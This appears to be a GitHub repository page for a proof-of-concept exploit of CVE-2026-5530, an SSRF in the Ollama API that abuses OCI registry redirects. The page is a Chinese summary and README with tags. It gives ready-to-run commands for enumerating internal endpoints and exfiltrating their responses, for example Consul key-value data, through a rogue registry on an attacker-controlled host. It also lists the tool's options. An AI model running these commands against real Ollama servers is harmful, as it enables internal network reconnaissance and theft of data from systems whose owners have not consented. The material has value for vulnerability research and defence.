davidrxchester/CVE-2026-5530

GitHub: davidrxchester/CVE-2026-5530

这是一个针对 CVE-2026-5530 的概念验证工具,利用 Ollama API 的 SSRF 漏洞通过 OCI 注册表重定向实现内网探测与数据外泄。

Stars: 0 | Forks: 0

# CVE-2026-5530 Ollama SSRF 通过 OCI registry 重定向实现完整响应外泄。 Writeup: https://davidrochester.com/posts/cve-2026-5530 ## 披露 多次联系 Ollama 均未收到回复。 ## 用法 三种模式:enum、exfil 和 probe。 ### Enum 从 Ollama 主机发现可访问的活跃内网端点。 ``` python3 poc.py targets.txt --registry-host ``` ### Exfil 当已知响应大小时,外泄 SSRF 响应。 ``` python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host ``` ### Probe 自动二分查找响应大小,然后进行外泄。 ``` python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host ``` ## 选项 ``` target URL or file of URLs (one per line, # for comments) -p, --port rogue registry port (default: 9999) --exfil-port exfil registry port (default: 10000) --exfil exfil mode, requires --size --probe binary search for size, then exfil --size Content-Length (required with --exfil) --registry-host your attacker IP/hostname that Ollama can reach --ollama Ollama API URL (default: http://127.0.0.1:11434) ```
标签:API 安全, CISA项目, CVE-2026-5530, GitHub, IP 地址批量处理, LLM评估, Maven, OCI registry, Ollama, POC, Python, SSRF, 二分查找, 代码生成, 信息泄露, 内网探测, 响应窃取, 实时处理, 容器镜像仓库, 插件系统, 无后门, 服务器端请求伪造, 渗透测试工具, 漏洞验证, 逆向工具, 重定向